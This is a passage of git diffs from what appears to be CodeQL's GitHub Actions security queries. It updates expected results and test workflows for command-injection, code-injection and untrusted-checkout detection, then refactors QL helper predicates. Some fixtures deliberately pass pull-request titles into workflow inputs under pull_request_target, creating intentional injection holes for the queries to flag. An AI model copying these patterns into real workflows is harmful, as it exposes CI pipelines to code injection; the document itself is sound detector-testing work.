.github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | Potential command injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | Potential command injection in $@, which may be controlled by an external user. | .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | diff --git a/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected b/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected index ebbf2f7cf0b..99ebb1edc05 100644 --- a/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected @@ -1,6 +1,5 @@ edges nodes | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml index 9c0b72dffea..a237856b6ce 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml @@ -1,11 +1,11 @@ name: Caller on: - issue_comment: + pull_request_target: jobs: test: permissions: {} uses: ./.github/workflows/reusable-workflow-1.yml with: - taint: ${{ github.event.comment.body }} + taint: ${{ github.event.pull_request.title }} diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml index 46be8d7009d..0f87d1e9394 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml @@ -1,10 +1,10 @@ name: Caller on: - issue_comment: + pull_request_target: jobs: test: uses: ./.github/workflows/reusable-workflow-2.yml with: - taint: ${{ github.event.comment.body }} + taint: ${{ github.event.pull_request.title }} diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 9ebd5508802..818b106b6d7 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -70,8 +70,8 @@ edges | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | provenance | | | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | provenance | | | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | provenance | | -| .github/workflows/reusable-workflow-caller-1.yml:11:15:11:46 | github.event.comment.body | .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | provenance | | -| .github/workflows/reusable-workflow-caller-2.yml:10:15:10:46 | github.event.comment.body | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | provenance | | +| .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | provenance | | +| .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | provenance | | | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | provenance | | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | provenance | | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | provenance | | @@ -287,8 +287,8 @@ nodes | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | semmle.label | env.log | -| .github/workflows/reusable-workflow-caller-1.yml:11:15:11:46 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/reusable-workflow-caller-2.yml:10:15:10:46 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | semmle.label | Uses Step: source [value] | @@ -451,9 +451,7 @@ subpaths | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | -| .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-1.yml:11:15:11:46 | github.event.comment.body | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | -| .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | ${{ env.log }} | -| .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:46 | github.event.comment.body | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | +| .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | ${{ env.log }} | | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 26d4741a469..75b64cea3e5 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -70,8 +70,8 @@ edges | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | provenance | | | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | provenance | | | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | provenance | | -| .github/workflows/reusable-workflow-caller-1.yml:11:15:11:46 | github.event.comment.body | .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | provenance | | -| .github/workflows/reusable-workflow-caller-2.yml:10:15:10:46 | github.event.comment.body | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | provenance | | +| .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | provenance | | +| .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | provenance | | | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | provenance | | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | provenance | | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | provenance | | @@ -287,8 +287,8 @@ nodes | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | semmle.label | env.log | -| .github/workflows/reusable-workflow-caller-1.yml:11:15:11:46 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/reusable-workflow-caller-2.yml:10:15:10:46 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | semmle.label | Uses Step: source [value] | @@ -414,10 +414,8 @@ subpaths | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | -| .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-1.yml:11:15:11:46 | github.event.comment.body | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | +| .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | ${{ env.log }} | -| .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:46 | github.event.comment.body | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | -| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | ${{ env.log }} | | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller3.yaml b/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller3.yaml index 1e7558b3bc0..560475dc938 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller3.yaml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/reusable_caller3.yaml @@ -1,7 +1,7 @@ name: assets-test on: - pull_request: + pull_request_target: jobs: check-execution-context: diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 4fbfca24126..13637396f90 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -255,7 +255,6 @@ edges | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/mend.yml:29:9:33:28 | Uses Step | .github/workflows/mend.yml:22:9:29:6 | Uses Step | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/poc2.yml:52:9:58:24 | Run Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | Execution of untrusted code on a privileged workflow. | @@ -273,7 +272,6 @@ edges | .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Execution of untrusted code on a privileged workflow. | -| .github/workflows/test9.yml:16:9:17:48 | Run Step | .github/workflows/test9.yml:11:9:16:6 | Uses Step | .github/workflows/test9.yml:16:9:17:48 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test11.yml:90:7:93:54 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | Execution of untrusted code on a privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected index 181bd5673bc..81a8c63c882 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected @@ -1,7 +1,3 @@ -| .github/workflows/issue_comment_3rd_party_action.yml:16:9:22:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_3rd_party_action.yml:30:9:36:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_3rd_party_action.yml:45:9:49:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_3rd_party_action.yml:49:9:52:25 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/issue_comment_direct.yml:12:9:16:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/issue_comment_direct.yml:20:9:24:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/issue_comment_direct.yml:28:9:32:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected index eb9fcc2418a..29237c9a544 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected @@ -4,9 +4,15 @@ | .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/dependabot1.yml:39:9:43:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/dependabot2.yml:33:9:38:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:16:9:22:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:30:9:36:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:45:9:49:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:49:9:52:25 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/mend.yml:22:9:29:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/poc.yml:30:9:36:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/test3.yml:28:9:33:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/test4.yml:18:7:25:4 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/test8.yml:20:9:26:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/test9.yml:11:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From abd49d5b110a37fcf311586179b0553790eee87f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 24 Sep 2024 12:12:29 +0200 Subject: [PATCH 0526/1267] Improve privilege workflow detection --- ql/lib/codeql/actions/Helper.qll | 16 ---------------- 1 file changed, 16 deletions(-) diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index f6c31a6e8ea..9ac67575b8b 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll @@ -252,26 +252,10 @@ predicate inPrivilegedExternallyTriggerableJob(AstNode node) { ) } -predicate calledByPrivilegedExternallyTriggerableJob(AstNode node) { - exists(ReusableWorkflow rw, ExternalJob caller, Job callee | - callee = node.getEnclosingJob() and - rw.getACaller() = caller and - rw.getAJob() = callee and - caller.isPrivilegedExternallyTriggerable() - ) - or - exists(LocalJob caller | - caller = node.getEnclosingCompositeAction().getACallerJob() and - caller.isPrivilegedExternallyTriggerable() - ) -} - predicate inPrivilegedContext(AstNode node) { inPrivilegedCompositeAction(node) or inPrivilegedExternallyTriggerableJob(node) - or - calledByPrivilegedExternallyTriggerableJob(node) } predicate inNonPrivilegedCompositeAction(AstNode node) { From 090d22fa7a870430a226ac8faddd210d6f59cab1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 24 Sep 2024 21:38:42 +0200 Subject: [PATCH 0527/1267] Add GetRepoRoot helper function --- ql/lib/codeql/actions/Helper.qll | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index 9ac67575b8b..0df7b125019 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll @@ -298,3 +298,20 @@ string defaultBranchNames() { not exists(string default_branch_name | repositoryDataModel(_, default_branch_name)) and result = ["main", "master"] } + +string getRepoRoot() { + exists(Workflow w | + w.getLocation().getFile().getRelativePath().indexOf("/.github/workflows") > 0 and + result = + w.getLocation() + .getFile() + .getRelativePath() + .prefix(w.getLocation().getFile().getRelativePath().indexOf("/.github/workflows") + 1) and + // exclude workflow_enum reusable workflows directory root + not result.indexOf(".github/reusable_workflows/") > -1 + or + not w.getLocation().getFile().getRelativePath().indexOf("/.github/workflows") > 0 and + not w.getLocation().getFile().getRelativePath().indexOf(".github/reusable_workflows") > -1 and + result = "" + ) +} From ffbddb10732d33cc934efc1d8dd570664a61e0d2 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 24 Sep 2024 21:40:15 +0200 Subject: [PATCH 0528/1267] Simplify Callable/call match --- ql/lib/codeql/actions/ast/internal/Ast.qll | 55 +++++++++++----------- 1 file changed, 28 insertions(+), 27 deletions(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index d05174f4787..d1c7718d77b 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -308,19 +308,22 @@ class CompositeActionImpl extends AstNodeImpl, TCompositeAction { LocalJobImpl getACallerJob() { result = this.getACallerStep().getEnclosingJob() } UsesStepImpl getACallerStep() { - exists(UsesStepImpl caller, string gwf_path, string path | - // the workflow files may not be rooted in the parent directory of .github/workflows - // extract the offset so we can remove it from the action path - gwf_path = - caller - .getLocation() + exists(DataFlow::CallNode call | + call.getCalleeNode() = this and + result = call.getCfgNode().getAstNode() + ) + } + + string getResolvedPath() { + result = + ["", "./"] + + this.getLocation() .getFile() .getRelativePath() - .prefix(caller.getLocation().getFile().getRelativePath().indexOf(".github/workflows/")) and - path = this.getLocation().getFile().getRelativePath().replaceAll(gwf_path, "") and - caller.getCallee() = ["", "./"] + path.prefix(path.indexOf(["/action.yml", "/action.yaml"])) and - result = caller - ) + .replaceAll(getRepoRoot(), "") + .replaceAll("/action.yml", "") + .replaceAll("/action.yaml", "") + .replaceAll(".github/reusable_workflows/", "") } private predicate hasExplicitSecretAccess() { @@ -352,6 +355,8 @@ class CompositeActionImpl extends AstNodeImpl, TCompositeAction { ) } + EventImpl getATriggerEvent() { result = this.getACallerJob().getATriggerEvent() } + /** Holds if the action is privileged and externally triggerable. */ predicate isPrivilegedExternallyTriggerable() { // the action is externally triggerable @@ -447,6 +452,16 @@ class ReusableWorkflowImpl extends AstNodeImpl, WorkflowImpl { result = call.getCfgNode().getAstNode() ) } + + string getResolvedPath() { + result = + ["", "./"] + + this.getLocation() + .getFile() + .getRelativePath() + .replaceAll(getRepoRoot(), "") + .replaceAll(".github/reusable_workflows/", "") + } } class InputsImpl extends AstNodeImpl, TInputsNode { @@ -1229,15 +1244,6 @@ abstract class UsesImpl extends AstNodeImpl { } } -/** - * Gets a regular expression that parses an `owner/repo@version` reference within a `uses` field in an Actions job step. - * The capture groups are: - * 1: The owner of the repository where the Action comes from, e.g. `actions` in `actions/checkout@v2` - * 2: The name of the repository where the Action comes from, e.g. `checkout` in `actions/checkout@v2`. - * 3: The version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. - */ -private string usesParser() { result = "([^/]+)/([^/@]+)@(.+)" } - /** A Uses step represents a call to an action that is defined in a GitHub repository. */ class UsesStepImpl extends StepImpl, UsesImpl { YamlScalar u; @@ -1249,19 +1255,14 @@ class UsesStepImpl extends StepImpl, UsesImpl { /** Gets the owner and name of the repository where the Action comes from, e.g. `actions/checkout` in `actions/checkout@v2`. */ override string getCallee() { if u.getValue().indexOf("@") > 0 - then - result = - ( - u.getValue().regexpCapture(usesParser(), 1) + "/" + - u.getValue().regexpCapture(usesParser(), 2) - ).toLowerCase() + then result = u.getValue().prefix(u.getValue().indexOf("@")) else result = u.getValue() } override ScalarValueImpl getCalleeNode() { result.getNode() = u } /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ - override string getVersion() { result = u.getValue().regexpCapture(usesParser(), 3) } + override string getVersion() { result = 